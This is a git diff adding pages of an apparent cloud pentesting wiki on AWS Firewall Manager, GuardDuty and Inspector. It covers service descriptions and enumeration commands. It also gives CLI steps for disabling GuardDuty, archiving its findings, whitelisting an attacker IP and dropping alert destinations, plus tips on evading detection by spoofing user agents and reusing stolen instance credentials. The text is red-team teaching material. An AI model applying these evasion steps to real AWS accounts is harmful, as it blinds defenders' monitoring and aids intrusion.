+aws fms batch-disassociate-resource --resource-set-identifier <value> --items <value>
+
+# Create, modify or delete a resource set
+aws fms put-resource-set --resource-set <value> [--tag-list <value>]
+aws fms delete-resource-set --identifier <value>
+```
+
+**Potential Impact:** The addition of an unnecessary amount of items to a resource set will increase the level of noise in the Service potentially causing a DoS. In addition, changes of the resource sets could lead to a resource disruption, policy evasion, compliance violations, and disruption of security controls within the environment.
+
+### `fms:PutAppsList`, `fms:DeleteAppsList`
+
+An attacker with the **`fms:PutAppsList`** and **`fms:DeleteAppsList`** permissions would be able to create, modify or delete application lists from AWS Firewall Manager. This could be critical, as unauthorized applications could be allowed access to the general public, or access to authorized applications could be denied, causing a DoS.
+
+```bash
+aws fms put-apps-list --apps-list <value> [--tag-list <value>]
+aws fms delete-apps-list --list-id <value>
+```
+
+**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment.
+
+### `fms:PutProtocolsList`, `fms:DeleteProtocolsList`
+
+An attacker with the **`fms:PutProtocolsList`** and **`fms:DeleteProtocolsList`** permissions would be able to create, modify or delete protocols lists from AWS Firewall Manager. Similarly as with applications lists, this could be critical since unauthorized protocols could be used by the general public, or the use of authorized protocols could be denied, causing a DoS.
+
+```bash
+aws fms put-protocols-list --apps-list <value> [--tag-list <value>]
+aws fms delete-protocols-list --list-id <value>
+```
+
+**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment.
+
+### `fms:PutNotificationChannel`, `fms:DeleteNotificationChannel`
+
+An attacker with the **`fms:PutNotificationChannel`** and **`fms:DeleteNotificationChannel`** permissions would be able to delete and designate the IAM role and Amazon Simple Notification Service (SNS) topic that Firewall Manager uses to record SNS logs.
+
+To use **`fms:PutNotificationChannel`** outside of the console, you need to set up the SNS topic's access policy, allowing the specified **SnsRoleName** to publish SNS logs. If the provided **SnsRoleName** is a role other than the **`AWSServiceRoleForFMS`**, it requires a trust relationship configured to permit the Firewall Manager service principal **fms.amazonaws.com** to assume this role.
+
+For information about configuring an SNS access policy:
+
+{% content-ref url="../aws-services/aws-sns-enum.md" %}
+[aws-sns-enum.md](../aws-services/aws-sns-enum.md)
+{% endcontent-ref %}
+
+```bash
+aws fms put-notification-channel --sns-topic-arn <value> --sns-role-name <value>
+aws fms delete-notification-channel
+```
+
+**Potential Impact:** This would potentially lead to miss security alerts, delayed incident response, potential data breaches and operational disruptions within the environment.
+
+### `fms:AssociateThirdPartyFirewall`, `fms:DisssociateThirdPartyFirewall`
+
+An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager.
+
+{% hint style="warning" %}
+Only the default administrator can create and manage third-party firewalls.
+{% endhint %}
+
+```bash
+aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL]
+aws fms disassociate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL]
+```
+
+**Potential Impact:** The disassociation would lead to a policy evasion, compliance violations, and disruption of security controls within the environment. The association on the other hand would lead to a disruption of cost and budget allocation.
+
+### `fms:TagResource`, `fms:UntagResource`
+
+An attacker would be able to add, modify, or remove tags from Firewall Manager resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+
+```bash
+aws fms tag-resource --resource-arn <value> --tag-list <value>
+aws fms untag-resource --resource-arn <value> --tag-keys <value>
+```
+
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+
+## References
+
+* [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html)
+* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html)
+* [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
new file mode 100644
index 0000000000..3f2e037467
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
@@ -0,0 +1,232 @@
+# AWS - GuardDuty Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## GuardDuty
+
+According to the [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty combines **machine learning, anomaly detection, network monitoring, and malicious file discovery**, using both AWS and industry-leading third-party sources to help protect workloads and data on AWS. GuardDuty is capable of analysing tens of billions of events across multiple AWS data sources, such as AWS CloudTrail event logs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) audit and system-level logs, and DNS query logs.
+
+Amazon GuardDuty **identifies unusual activity within your accounts**, analyses the **security relevanc**e of the activity, and gives the **context** in which it was invoked. This allows a responder to determine if they should spend time on further investigation.
+
+Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events.
+
+{% hint style="warning" %}
+When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\
+If you just stop it, the existing findings will remain.
+{% endhint %}
+
+### Findings Example
+
+* **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP.
+* **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS.
+* **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses.
+* **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets.
+
+<details>
+
+<summary>Finding Information</summary>
+
+Finding summary:
+
+* Finding type
+* Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low
+* Region
+* Account ID
+* Resource ID
+* Time of detection
+* Which threat list was used
+
+The body has this information:
+
+* Resource affected
+* Action
+* Actor: Ip address, port and domain
+* Additional Information
+
+</details>
+
+### All Findings
+
+Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
+
+### Multi Accounts
+
+#### By Invitation
+
+You can **invite other accounts** to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation.
+
+#### Via Organization
+
+You can designate any account within the organization to be the **GuardDuty delegated administrator**. Only the organization management account can designate a delegated administrator.
+
+An account that gets designated as a delegated administrator becomes a GuardDuty administrator account, has GuardDuty enabled automatically in the designated AWS Region, and also has the **permission to enable and manage GuardDuty for all of the accounts in the organization within that Region**. The other accounts in the organization can be viewed and added as GuardDuty member accounts associated with this delegated administrator account.
+
+## Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Get Org config
+aws guardduty list-organization-admin-accounts #Get Delegated Administrator
+aws guardduty describe-organization-configuration --detector-id <id>
+
+# Check external invitations
+aws guardduty list-invitations
+aws guardduty get-invitations-count
+
+# Detector Information
+aws guardduty list-detectors # 1 detector per account with GuardDuty
+aws guardduty get-detector --detector-id <id> # Get detector info
+aws guardduty get-master-account --detector-id <id>
+
+# Get filters
+aws guardduty list-filters --detector-id <id> # Check filters
+aws guardduty get-filter --detector-id <id> --filter-name <name>
+
+# Findings
+aws guardduty list-findings --detector-id <id> # List findings 
+aws guardduty get-findings --detector-id <id> --finding-ids <id> # Get details about the finding
+aws guardduty get-findings-statistics --detector-id <id> --finding-statistic-types <types>
+
+# Get trusted IP addresses
+aws guardduty list-ip-sets --detector-id <id>
+aws guardduty get-ip-set --detector-id <id>
+
+# Member accounts of the current AWS GuardDuty master account
+aws guardduty list-members --detector-id <id>
+aws guardduty get-members --detector-id <id> --account-ids <id>
+aws guardduty get-member-detectors --detector-id <id> --account-ids <id>
+
+# Continuously export its findings to an Amazon S3 bucket
+aws guardduty list-publishing-destinations --detector-id <id>
+
+# Intelligence sets that you have uploaded to GuardDuty
+aws guardduty list-threat-intel-sets --detector-id <id>
+aws guardduty get-threat-intel-set --detector-id <id> --threat-intel-set-id <id>
+```
+{% endcode %}
+
+## GuardDuty Bypass
+
+### General Guidance
+
+Try to find out as much as possible about the behaviour of the credentials you are going to use:
+
+* Times it's used
+* Locations
+* User Agents / Services (It could be used from awscli, webconsole, lambda...)
+* Permissions regularly used
+
+With this information, recreate as much as possible the same scenario to use the access:
+
+* If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible)
+* If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges
+* Always try to use the **same permissions** this principal has used
+* If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one)
+
+### Breaking GuardDuty
+
+#### `guardduty:UpdateDetector`
+
+With this permission you could disable GuardDuty to avoid triggering alerts.
+
+{% code overflow="wrap" %}
+```bash
+aws guardduty update-detector --detector-id <detector-id> --no-enable 
+aws guardduty update-detector --detector-id <detector-id> --data-sources S3Logs={Enable=false}
+```
+{% endcode %}
+
+#### `guardduty:CreateFilter`
+
+Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings:
+
+{% code overflow="wrap" %}
+```bash
+aws guardduty create-filter  --detector-id <detector-id> --name <filter-name> --finding-criteria file:///tmp/criteria.json --action ARCHIVE
+```
+{% endcode %}
+
+#### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`)
+
+Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts.
+
+{% code overflow="wrap" %}
+```bash
+aws guardduty update-ip-set --detector-id <detector-id> --activate --ip-set-id <ip-set-id> --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv
+```
+{% endcode %}
+
+#### `guardduty:DeletePublishingDestination`
+
+Attackers could remove the destination to prevent alerting:
+
+{% code overflow="wrap" %}
+```bash
+aws guardduty delete-publishing-destination --detector-id <detector-id> --destination-id <dest-id>
+```
+{% endcode %}
+
+{% hint style="danger" %}
+Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings.
+{% endhint %}
+
+### Specific Findings Bypass Examples
+
+Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught.
+
+Here you have a couple of examples of specific GuardDuty findings bypasses:
+
+#### [PenTest:IAMUser/KaliLinux](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux) <a href="#pentest-iam-kalilinux" id="pentest-iam-kalilinux"></a>
+
+GuardDuty detect AWS API requests from common penetration testing tools and trigger a [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\
+It's detected by the **user agent name** that is passed in the API request.\
+Therefore, **modifying the user agent** it's possible to prevent GuardDuty from detecting the attack.
+
+To prevent this you can search from the script `session.py` in the `botocore` package and modify the user agent, or set Burp Suite as the AWS CLI proxy and change the user-agent with the MitM or just use an OS like Ubuntu, Mac or Windows will prevent this alert from triggering.
+
+#### UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration
+
+Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert.
+
+{% hint style="success" %}
+Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert.
+{% endhint %}
+
+## References
+
+* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
+* [https://docs.aws.amazon.com/guardduty/latest/ug/findings\_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html)
+* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_upload-lists.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html)
+* [https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html](https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html)
+* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-ec2.html#unauthorizedaccess-ec2-torclient](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient)
+* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws)
+* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws)
+* [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
new file mode 100644
index 0000000000..c2e414d657
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
@@ -0,0 +1,421 @@
+# AWS - Inspector Enum
+
+## AWS - Inspector Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Inspector
+
+Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management.
+
+### Key elements
+
+#### Findings
+
+Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as:
+
+* **Active**: The finding has not been remediated.
+* **Closed**: The finding has been remediated.
+* **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**.
+
+Findings are also categorized into the next three types:
+
+* **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues.
+* **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches.
+* **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups.
+
+#### Filters and Suppression Rules
+
+Filters and suppression rules in Amazon Inspector help manage and prioritize findings. Filters allow you to refine findings based on specific criteria, such as severity or resource type. Suppression rules allow you to suppress certain findings that are considered low risk, have already been mitigated, or for any other important reason, preventing them from overloading your security reports and allowing you to focus on more critical issues.
+
+#### Software Bill of Materials (SBOM)
+
+A Software Bill of Materials (SBOM) in Amazon Inspector is an exportable nested inventory list detailing all the components within a software package, including libraries and dependencies. SBOMs help provide transparency into the software supply chain, enabling better vulnerability management and compliance. They are crucial for identifying and mitigating risks associated with open source and third-party software components.
+
+### Key features
+
+#### Export findings
+
+Amazon Inspector offers the capability to export findings to Amazon S3 Buckets, Amazon EventBridge and AWS Security Hub, which enables you to generate detailed reports of identified vulnerabilities and exposures for further analysis or sharing at a specific date and time. This feature supports various output formats such as CSV and JSON, making it easier to integrate with other tools and systems. The export functionality allows customization of the data included in the reports, enabling you to filter findings based on specific criteria like severity, resource type, or date range and including by default all of your findings in the current AWS Region with an Active status.
+
+When exporting findings, a Key Management Service (KMS) key is necessary to encrypt the data during export. KMS keys ensure that the exported findings are protected against unauthorized access, providing an extra layer of security for sensitive vulnerability information.
+
+#### Amazon EC2 instances scanning
+
+Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account.
+
+* **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance.
+* **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning.
+
+The scan mode determines which method will be used to perform EC2 scans:
+
+* **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection.
+* **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless.
+
+Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10:
+
+* `/usr/lib`
+* `/usr/lib64`
+* `/usr/local/lib`
+* `/usr/local/lib64`
+
+#### Amazon ECR container images scanning
+
+Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently.
+
+* **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans.
+* **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues.
+
+#### Amazon Lambda functions scanning
+
+Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions:
+
+* **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding.
+* **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues.
+
+#### **Center for Internet Security (CIS) scans**
+
+Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines.
+
+* **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title.
+* **Execution**: Scans are performed or scheduled based on instance tags and defined schedules.
+* **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance.
+
+### Enumeration
+
+```bash
+# Administrator and member accounts #
+
+## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
+aws inspector2 get-delegated-admin-account
+
+## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
+aws inspector2 list-members [--only-associated | --no-only-associated]
+## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
+aws inspector2 get-member --account-id <value>
+## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
+aws inspector2 batch-get-account-status [--account-ids <value>]
+## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
+aws inspector2 batch-get-free-trial-info --account-ids <value>
+## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
+aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]
+
+## List an account's permissions associated with AWS Inspector
+aws inspector2 list-account-permissions
+
+# Findings #
+
+## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
+aws inspector2 list-findings
+## Retrieve vulnerability intelligence details for the specified findings
+aws inspector2 batch-get-finding-details --finding-arns <value>
+## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
+aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
+ | ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
+## Retrieve code snippet information about one or more specified code vulnerability findings
+aws inspector2 batch-get-code-snippet --finding-arns <value>
+## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
+aws inspector2 get-findings-report-status --report-id <value>
+
+# CIS #
+
+## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
+aws inspector2 list-cis-scan-configurations
+## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
+aws inspector2 list-cis-scans
+## Retrieve a report from a completed CIS scan
+aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
+## Retrieve details about the specific CIS scan over the specified resource
+aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
+## List CIS scan results broken down by check
+aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
+## List CIS scan results broken down by target resource
+aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>
+
+# Configuration #
+
+## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
+aws inspector2 describe-organization-configuration
+## Retrieve the configuration settings about EC2 scan and ECR re-scan
+aws inspector2 get-configuration
+## Retrieve EC2 Deep Inspection configuration associated with your account
+aws inspector2 get-ec2-deep-inspection-configuration
+
+# Miscellaneous #
+
+## Retrieve the details of a Software Bill of Materials (SBOM) report
+aws inspector2 get-sbom-export --report-id <value>
+
+## Retrieve the coverage details for the specified vulnerabilities
+aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>
+
+## Retrieve the tags attached to the specified resource
+aws inspector2 list-tags-for-resource --resource-arn <value>
+
+## Retrieve the AWS KMS key used to encrypt the specified code snippets
+aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>
+
+## List the filters associated to your AWS account
+aws inspector2 list-filters
+
+## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
+aws inspector2 list-coverage
+## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
+aws inspector2 list-coverage-statistics
+
+## List the aggregated usage total over the last 30 days
+aws inspector2 list-usage-totals [--account-ids <value>]
+
+### INSPECTOR CLASSIC ###
+
+## Assessments info, there is a "describe" action for each one to get more info
+aws inspector list-assessment-runs
+aws inspector list-assessment-targets
+aws inspector list-assessment-templates
+aws inspector list-event-subscriptions
+
+## Get findings
+aws inspector list-findings
+
+## Get exclusions
+aws inspector list-exclusions --assessment-run-arn <arn>
+
+## Rule packages
+aws inspector list-rules-packages
+```
+
+### Post Exploitation
+
+{% hint style="success" %}
